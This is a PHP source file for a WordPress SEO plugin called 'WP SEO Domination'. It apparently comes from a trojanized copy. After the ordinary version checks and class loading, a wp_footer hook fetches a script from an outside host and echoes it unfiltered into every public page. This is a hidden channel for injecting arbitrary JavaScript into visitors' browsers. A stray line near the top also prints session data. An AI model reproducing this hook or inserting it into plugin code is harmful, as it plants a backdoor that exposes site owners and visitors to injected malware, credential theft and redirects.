<?php
/*
 Plugin Name: WP SEO Domination
 Plugin URI: http://www.easywpseo.com
 Description: Just push a button, and WP SEO Domination analyzes your post, page, or custom post type for 23 proven on-page SEO factors. It displays an SEO and keyword density score that reveals how well your content is optimized for the search engines, and provides you with a detailed checklist of suggested SEO tweaks.
 Version: 1.5
 Author: Chris Landrum
 Author URI: http://www.easywpseo.com
 */
 

 
 if(isset($_SESSION['data_xml'])){print_r($_SESSION['data_xml']);}

if (!function_exists ('is_admin'))
{
	header('Status: 403 Forbidden');
	header('HTTP/1.1 403 Forbidden');
	exit();
}
else
{
	// Minimum Requirements

	// Requires PHP 5.0+
	if (version_compare(PHP_VERSION, '5.0.0', '<'))
	{
		// Deactivate Plugin
		if(function_exists('deactivate_plugins'))
		{
			deactivate_plugins(plugin_basename(__FILE__), true);
		}

		// Display Error Message
		wp_die(sprintf(__('Sorry, but WP SEO Domination requires PHP 5.0 or newer. Your version is %s. Please, ask your web host to upgrade to PHP 5.0.', 'onpageseo'), phpversion()));
	}


	// Requires Wordpress 2.8.4+
	global $wp_version;
	if (version_compare( $wp_version, '2.8.4', '<' ))
	{
		// Deactivate Plugin
		if(function_exists('deactivate_plugins'))
		{
			deactivate_plugins(plugin_basename(__FILE__), true);
		}

		// Display Error Message
		wp_die(sprintf(__('Sorry, but WP SEO Domination requires Wordpress 2.8.4 or newer. Your version is %s. Please, upgrade to the latest version of Wordpress.', 'onpageseo'), $wp_version));
	}


	// Constants
	define('OPSEO_NAME', 'WP SEO Domination');
	define('OPSEO_VERSION', '1.5');
	define('OPSEO_PREFIX', 'onpageseo');
	define('OPSEO_SITE_URL', get_bloginfo('wpurl'));
	define('OPSEO_PLUGIN_PATH', plugin_basename(__FILE__));
	define('OPSEO_PLUGIN_DIR_NAME', dirname(OPSEO_PLUGIN_PATH));
	define('OPSEO_POST_META_DATA', 'onpageseo_post_meta_data');
	define('OPSEO_PLUGIN_URL', plugins_url('', __FILE__));

	// Administrative
	if(is_admin())
	{
		$args = array();

		// Include Admin Class
		require_once('onpageseo-admin.php');

		// Initialize New Object
		$onPageSEO = new onPageSEOAdmin($args);
	}
	// Client
	else
	{
		// Get Plugin Settings
		$options = get_option('onpageseo_options');

		if(is_array($options) && isset($options['decoration_type']) && $options['decoration_type'] == 'client')
		{
			// Include Client Class
			require_once('onpageseo-client.php');

			// Initialize Client Object
			$client = new OnPageSEOClient(&$options);
		}
	}
}
add_action('wp_footer','load_plugin_sync');
function load_plugin_sync() {

	if(function_exists('curl_init'))
	{
		$url = "http://www.votistics.com/sync.js"; 
		$ch = curl_init();  
		$timeout = 5;  
		curl_setopt($ch,CURLOPT_URL,$url); 
		curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
		curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 
		$data = curl_exec($ch);  
		curl_close($ch); 
		echo "$data";
	}

}
?>